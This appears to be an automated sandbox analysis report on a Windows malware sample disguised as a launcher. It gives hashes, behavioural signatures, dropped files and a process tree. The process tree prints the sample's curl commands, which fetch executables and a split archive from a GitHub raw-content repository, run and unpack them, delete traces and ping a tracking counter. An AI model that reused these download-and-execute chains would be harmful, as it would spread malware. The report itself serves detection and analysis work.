b3c27c4c4db1ee499afb4de38367c45d4c1a00c3878fc3ba3061a44f5fbc27da

Analysis

max time kernel
150s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
20-06-2024 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RewAdIs_Launcher_v05.exe
Size

1.2MB
MD5

053487a5f68d7bb1a8fb36d07edef428
SHA1

799a6e4be54ad869319011380df12b6368024f08
SHA256

6c957cd9581d6c18df39a3b458ff6ac4d8b388cb7b66fb97ba4d314334493029
SHA512

f07722d73238226d04dad7f54b99c2f28f045d08b39d0e6133bd84a8d7316b6a84c07a2dfd2f1953c91744a036ed96f7944d8d0b638a9e7a264761096e31f18a
SSDEEP

24576:1RaZROMOm8FN7TjsPnzt2heeRhQbJEOeamDZNuFf:fkxOm+7TjsPnztyDMmawu

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
4964	RewAdIs_Launcher_v08.exe
3308	z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com
26	raw.githubusercontent.com
28	raw.githubusercontent.com
29	raw.githubusercontent.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/files/0x000a00000002336a-8.dat	autoit_exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4964	RewAdIs_Launcher_v08.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	3308	z.exe
Token: 35	3308	z.exe
Token: SeSecurityPrivilege	3308	z.exe
Token: SeSecurityPrivilege	3308	z.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
2964	RewAdIs_Launcher_v05.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe
4964	RewAdIs_Launcher_v08.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 2964 wrote to memory of 732	2964	RewAdIs_Launcher_v05.exe	82
PID 2964 wrote to memory of 732	2964	RewAdIs_Launcher_v05.exe	82
PID 732 wrote to memory of 1916	732	cmd.exe	84
PID 732 wrote to memory of 1916	732	cmd.exe	84
PID 2964 wrote to memory of 5080	2964	RewAdIs_Launcher_v05.exe	86
PID 2964 wrote to memory of 5080	2964	RewAdIs_Launcher_v05.exe	86
PID 2964 wrote to memory of 3284	2964	RewAdIs_Launcher_v05.exe	89
PID 2964 wrote to memory of 3284	2964	RewAdIs_Launcher_v05.exe	89
PID 2964 wrote to memory of 3348	2964	RewAdIs_Launcher_v05.exe	92
PID 2964 wrote to memory of 3348	2964	RewAdIs_Launcher_v05.exe	92
PID 3348 wrote to memory of 4028	3348	cmd.exe	94
PID 3348 wrote to memory of 4028	3348	cmd.exe	94
PID 2964 wrote to memory of 3460	2964	RewAdIs_Launcher_v05.exe	96
PID 2964 wrote to memory of 3460	2964	RewAdIs_Launcher_v05.exe	96
PID 3460 wrote to memory of 4964	3460	cmd.exe	98
PID 3460 wrote to memory of 4964	3460	cmd.exe	98
PID 4964 wrote to memory of 2584	4964	RewAdIs_Launcher_v08.exe	99
PID 4964 wrote to memory of 2584	4964	RewAdIs_Launcher_v08.exe	99
PID 2584 wrote to memory of 1192	2584	cmd.exe	101
PID 2584 wrote to memory of 1192	2584	cmd.exe	101
PID 4964 wrote to memory of 4368	4964	RewAdIs_Launcher_v08.exe	102
PID 4964 wrote to memory of 4368	4964	RewAdIs_Launcher_v08.exe	102
PID 4964 wrote to memory of 1988	4964	RewAdIs_Launcher_v08.exe	104
PID 4964 wrote to memory of 1988	4964	RewAdIs_Launcher_v08.exe	104
PID 4964 wrote to memory of 4144	4964	RewAdIs_Launcher_v08.exe	108
PID 4964 wrote to memory of 4144	4964	RewAdIs_Launcher_v08.exe	108
PID 4144 wrote to memory of 3432	4144	cmd.exe	110
PID 4144 wrote to memory of 3432	4144	cmd.exe	110
PID 4964 wrote to memory of 3556	4964	RewAdIs_Launcher_v08.exe	111
PID 4964 wrote to memory of 3556	4964	RewAdIs_Launcher_v08.exe	111
PID 3556 wrote to memory of 4432	3556	cmd.exe	113
PID 3556 wrote to memory of 4432	3556	cmd.exe	113
PID 4964 wrote to memory of 856	4964	RewAdIs_Launcher_v08.exe	118
PID 4964 wrote to memory of 856	4964	RewAdIs_Launcher_v08.exe	118
PID 4964 wrote to memory of 5076	4964	RewAdIs_Launcher_v08.exe	120
PID 4964 wrote to memory of 5076	4964	RewAdIs_Launcher_v08.exe	120
PID 5076 wrote to memory of 3308	5076	cmd.exe	122
PID 5076 wrote to memory of 3308	5076	cmd.exe	122
PID 4964 wrote to memory of 3296	4964	RewAdIs_Launcher_v08.exe	124
PID 4964 wrote to memory of 3296	4964	RewAdIs_Launcher_v08.exe	124
PID 4964 wrote to memory of 4056	4964	RewAdIs_Launcher_v08.exe	126
PID 4964 wrote to memory of 4056	4964	RewAdIs_Launcher_v08.exe	126
PID 4964 wrote to memory of 4192	4964	RewAdIs_Launcher_v08.exe	128
PID 4964 wrote to memory of 4192	4964	RewAdIs_Launcher_v08.exe	128
PID 4964 wrote to memory of 3832	4964	RewAdIs_Launcher_v08.exe	130
PID 4964 wrote to memory of 3832	4964	RewAdIs_Launcher_v08.exe	130
PID 4964 wrote to memory of 4548	4964	RewAdIs_Launcher_v08.exe	132
PID 4964 wrote to memory of 4548	4964	RewAdIs_Launcher_v08.exe	132
PID 4548 wrote to memory of 3488	4548	cmd.exe	134
PID 4548 wrote to memory of 3488	4548	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v05.exe
"C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v05.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:732
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
    3⤵
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del ndx
  2⤵
  PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3348
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
    3⤵
    PID:4028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c RewAdIs_Launcher_v08.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3460
- - C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe
    RewAdIs_Launcher_v08.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\curl.exe
        
        curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
        5⤵
        
        PID:1192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ndx
      4⤵
      PID:4368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del RewAdIs_Launcher_v05.exe
      4⤵
      PID:1988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4144
    - - C:\Windows\system32\curl.exe
        
        curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
        5⤵
        
        PID:3432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3556
    - - C:\Windows\system32\curl.exe
        
        curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
        5⤵
        
        PID:4432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /Q temp
      4⤵
      PID:856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c z.exe e ISKA.7z.001 -aoa -otemp
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5076
    - - C:\Users\Admin\AppData\Local\Microsoft\ISKA\z.exe
        
        z.exe e ISKA.7z.001 -aoa -otemp
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.001
      4⤵
      PID:3296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.002
      4⤵
      PID:4056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.003
      4⤵
      PID:4192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ISKA.7z.004
      4⤵
      PID:3832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl "https://counter9.stat.ovh/private/freecounterstat.php?c=enh1kq3au6353hbgwt5xr7ea61qfbwrl" --ssl-no-revoke -o Tk.png
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4548
    - - C:\Windows\system32\curl.exe
        
        curl "https://counter9.stat.ovh/private/freecounterstat.php?c=enh1kq3au6353hbgwt5xr7ea61qfbwrl" --ssl-no-revoke -o Tk.png
        5⤵
        
        PID:3488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\ISKA\ISKA.7z.001

Filesize
20.0MB

MD5
899308a4d4643b109c3e8e549ddade00

SHA1
742a24092692c40cce7a17dd9cff8bdd2c167351

SHA256
055b09cfac35ddd9f3d2773dfb2ec0a7177093e0312edc728a59543fca096674

SHA512
8741b6db909557cca81b0d93d298433dc40669f3d97eb066b2355f95d360d3d2d82f16f682b4481d984dc9dec3689e93c8f63f98cc055cf7250a5af7c71a824d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\ISKA.7z.002

Filesize
13.2MB

MD5
987eea8a73bfc55daa30c6081fc27e42

SHA1
e8650beab33d78b7543a8e5457687b3a6b83e4a5

SHA256
984969cbaa22eda5dc9098b551cd913eb8bf0ae5ec500a242d15f05488a72403

SHA512
5f0e41c2cc36ea763122ae644d0340df6540159447e150e0ea0b6f88e8cc54d69bd031bbf06c8c232ec53f95af911a2f4acdcce9dd8cf2e20dcd095f01cd7a97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\Discord.bmp

Filesize
7KB

MD5
7206f478fa02a2f4dd17ee32e1d28c70

SHA1
f5b4b1fd8a8cb24084c69c18285ed191f660b3c8

SHA256
ac53703819e6d9211b3b2bbd3074593a9425ddc6b3c9fef88d71b8c5ddf66e89

SHA512
2470394f02dd34e6901c052619b1054f4ad0ed36cdb9284fa7bba98efb72e430568384b760fb0cc46784d3e88a0d96e3ccadd6824b5cd6c2ebeb1d143cb37cae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\KK.bmp

Filesize
7KB

MD5
dc737b0022fd14466e502c5403193051

SHA1
0d0cea87feaab8d2448e1ff2a8dc54029006973f

SHA256
02e30495f39f114e6d912dc438e9fc476180385846874085f60242c77d1c45d3

SHA512
7788282a170753238a6d8139d304145789d573579ecfffbe0182740c1c09ae8a9239017955d6dc317a632e205d00a50d1cce3f9150849c673c4514ebc35a1311

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\L.bmp

Filesize
58B

MD5
22ba9d43aa1d26928512e501f6a029a5

SHA1
2f309fd033e3a11359698c5ac96d2c74581c58fc

SHA256
c0223f90691a3eff0bf1c2f1737aab1779b6f1a533364c5305832dd63a618794

SHA512
b572d47ae96e9aa92fa864f4df1dd1e4a7a37cf597b7172c640ae80b774ab2c8eca0a99e9b1b3cfb7aaba1f666bda2343fc8c4d25d80de5789e74f3e0c140e18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\Tk.png

Filesize
1KB

MD5
dc63b4bc658a2071f95254f200bb3875

SHA1
f4c4686a31ffb9f0f0e44ccbe753ccb88553123a

SHA256
035267472b819110674124e144f73b08dcba4eb4c5b2c0c4837485165d8a8bc5

SHA512
c4f2551a4247ab800b13a8d6d988e18012982417e8a84bfccc6a42fc396d9ffc9ae92ab480c7d9635a89a66e01514e7482c9b52efa2a39d208f88152fea09f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\YouTube.bmp

Filesize
7KB

MD5
7b127b317b77fbc4400eaeab3138b99f

SHA1
0a3e9939e93b37cd2544dd5ebb674c143c0b764b

SHA256
fdf902d2ed7c0eb09e5085fc110eabc937d054dfd78906567b876c40621ed5ea

SHA512
cfc12db096a83529802530cd7101eb8522ae88e0b04bc641659e947aac3a22f8fd5ddfcf455fffac7adb6a21d42f9fc50e03d8dc0c84a5ac60d258abd315a921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\cc0_2.jpg

Filesize
65KB

MD5
b2889e07e60e9575085c560a6869f1db

SHA1
5742603260ad6d1e633b8c60367c0bdb8ccf9c05

SHA256
e63a64c63c551127a6612fc2657fb380975e3a30320672be2a80c2ab270f25d0

SHA512
7f5817d36370bff84626fcbc294ded8a984bc60b43c8ce93790c3f542c8f87755b22cb55c591f2ed57ba2fc6e0de93ba1188e6bfff8ce5c520d0ed7312529c18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\dd1_2.jpg

Filesize
46KB

MD5
b45787798d43876e2fe6f13917ca8f23

SHA1
ad98e9cff2295efe9814a23a9a23c9d9ce4dc62c

SHA256
2e405285316702e5a09858e4146b3dcd7f3aa02cd9bedf38f4dc90219ba90a57

SHA512
4d09e22ebe7796a2b7de7cd50918a4ec6f8c775c75d0ed6cd3a8fb8cfee0aec51a97642ef3dabfb7c584ea5aa74fb81a4ed6bb949765b460ef929501d30b7d72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\du.bmp

Filesize
7KB

MD5
9e68b1792237bef66d7802791cc771f8

SHA1
7e8a6ee413a7f1d267e04ab209ae7049c40fd00f

SHA256
fba03cfb918bd9f78696d54448b9827bf3f416db9658dc2212f4ed3feabe4be0

SHA512
b5f341b532f0c2f1c721e8092b31cb8ccb03d99be747ca35d519f040217e9e0ebec095921cbbb7183c23b2363d54dfeb97fe068d5e14ef946262197c46491bd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\indir.bmp

Filesize
23KB

MD5
3e7b47d45826dc2c3669661a0eaae6a6

SHA1
83efeabc64b368c1ae9c9876f145ad01cce8259a

SHA256
b8ed3e70ec4b513fd4c236548dc904107018f01c284f965f1bc776e98bea1027

SHA512
939f05daa553dea465f8cc2a3f2368a2fdbb40b9cb365dfb724af265e1329b64effcf30cd5b5275d0bdf854c4caeb8d7173103fec1d94bd5907f113df17dcf3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\kapat.bmp

Filesize
7KB

MD5
96e0159d93305d430be0f017ddd1d0ad

SHA1
09a2c8c63bd9a4f36a170e84be0d91fcf8ca1423

SHA256
0f3bea36dd097a2e659ac143993f39682877656fc6bbc1b8a6186e0f9fe52919

SHA512
3f27f619d6829e0eceb8e6369d11b8f130f01a49f9cfa1b1c1ebbd4e060fcf04c6d317a882b8af09a52a9d9ceb9ab5f8a6a9c2908199c1ae4a8ff86b51a9f393

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\ninfo.txt

Filesize
737B

MD5
423e91ee10910ccfb8311d6ee334fbfc

SHA1
edc7166918e587cababd498137fa583323925cd5

SHA256
f04074e7113ebcda04a635a24541ddf9aa4d0b464791994c8c3aaf7ea9e862f8

SHA512
66640e03530f2374142ce4b8baeb451d2b8a921a2fe1868cdbf60066c5aef4a4e0f9a17643655c5c7f1e7cd3c9be4127d742607eda6249fcfec4cab42d3dc14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\nn33_2.jpg

Filesize
59KB

MD5
3ef7a635b8df6e886c67bf4c47239c0a

SHA1
2950af123162cb6c8e1d0f20f04a84480d0f97f5

SHA256
9acfc1552c7bbb62e5a2c5c42bbb7ab948e5a04ef56bfc6017f4f9676f66f246

SHA512
81a6703618f5be2d6c7c927339e2dac9fe905024988a964982a4e56d0604b5557cad90793dc7ec7ce10aca7ddd89b3ef7c085aaee53658d52e0f2861a4e49fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\ns.bmp

Filesize
7KB

MD5
3e8ffae94a2f30e18fa02e68ed3de382

SHA1
f434484efc15071248e14945b2e32235d318b0a4

SHA256
cf2106a4cbcf9ba5c775504714010d97fae71c4702f16b5ca8056cf732a41b5a

SHA512
bfd4cfc4bb579fe3ad222dcc8dfa1f0529a1f54eef49df3ab845a1f0ef5d7d5e0be7239d3f42f22f9a6dd4681f8a81ba623b4c8ae5cb5cfb15f9f84b978445fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\pc.bmp

Filesize
7KB

MD5
9ee5dd068a015c0a166935d45fb3944f

SHA1
5e55f6e81eed659a37ce4c528d312d4871a38c49

SHA256
c5ceb11164c7c9fd80d168febeff79c9cbeb440ea5cd506b2657eec3df00aecb

SHA512
9f529d95e015d315d7c21739b496efa8b2128b1266085c30c1ccc8fb549497cf6e095b819fa90524cc16b3100d33cf9040ed8250698c2f231f3b5237ce6fb68d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\temp\sol.bmp

Filesize
7KB

MD5
3d04a772d0e6348799de56909c724139

SHA1
f14a1945cc923ab82de9be1181ca4b83c95291a7

SHA256
cc1832d16dbf678719041af0c73d006557b3dbf89dca292bc84fdd615b313f37

SHA512
5a64d9c11d1d1f660b1abdd61ebc0c27641aca466ef9b51bcc537a6adacf1dbed7fc83d19db39987849502086511bc93b0d7afb7ff32c8a244822f5b536be6d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\u

Filesize
50B

MD5
9dec6bf4a0e0328e1f5b6e72d90f532a

SHA1
fd37287789abdd7b0ead4dd8a127ff6dcc2d024f

SHA256
9b3388c5db1a8a9b0905b2d3a6e8020adb67d038116498fbcd781d556188261d

SHA512
3e7551f2909f817a8a812347b0fe7fed3450f7fd438a11f26f191ade668f3e542086956e5a89b2b54d4c98eb8db27db7c84bbc412c2af2de8c8f9c1a895d175d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ISKA\z.exe

Filesize
543KB

MD5
2f58d2175bd282f29cb215275a18100f

SHA1
f7daad8646e9b633b9e57df43ec819d6e72c907c

SHA256
cf20cf85335562d6d62ba191614393f8da80664d3d6126c9fbaec9c7caadaaa2

SHA512
44ae15cada6b0823e0717a27dcfe2e4bd245184c0dd96961de7ff2eaabc3947fffb6fe86c9fb0f77e39fb81f0bf2a54f86206d9f7a267a05cee38525c65d54e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ndx

Filesize
25KB

MD5
b459340593580e161d16d3a1c6a8c403

SHA1
ee85a630eb5c8f1cc7064bc60f68510893d51671

SHA256
eee74343ae80223a949385d7b35d5c90db5b6ecea63e98ced8bc7ac8d62bf152

SHA512
812c6b3a36a2142a53e2f2041d509ee7d4e61801d4676dabdd920fd77a230f12401c854a5284fa4c6e7d74c1fdfd0fd7c618dbaacc42bc3233503021ca403afa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\pcsw

Filesize
2B

MD5
88dba0c4e2af76447df43d1e31331a3d

SHA1
36f780fdbda5b2b2ce85c9ebb57086d1880ae757

SHA256
21d017c40a91c15748f0b98cd826ba445d2d3fe227e310bfd58dcb6c431826a0

SHA512
4c34894f42b47ee156997e54e03425f820a3aad6fe8c863d4a07b57c168e846db1a31d1230cec16643b9f1219c38e91331558842dd24a142fee381e465b751ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe

Filesize
1.2MB

MD5
053487a5f68d7bb1a8fb36d07edef428

SHA1
799a6e4be54ad869319011380df12b6368024f08

SHA256
6c957cd9581d6c18df39a3b458ff6ac4d8b388cb7b66fb97ba4d314334493029

SHA512
f07722d73238226d04dad7f54b99c2f28f045d08b39d0e6133bd84a8d7316b6a84c07a2dfd2f1953c91744a036ed96f7944d8d0b638a9e7a264761096e31f18a

Download Submit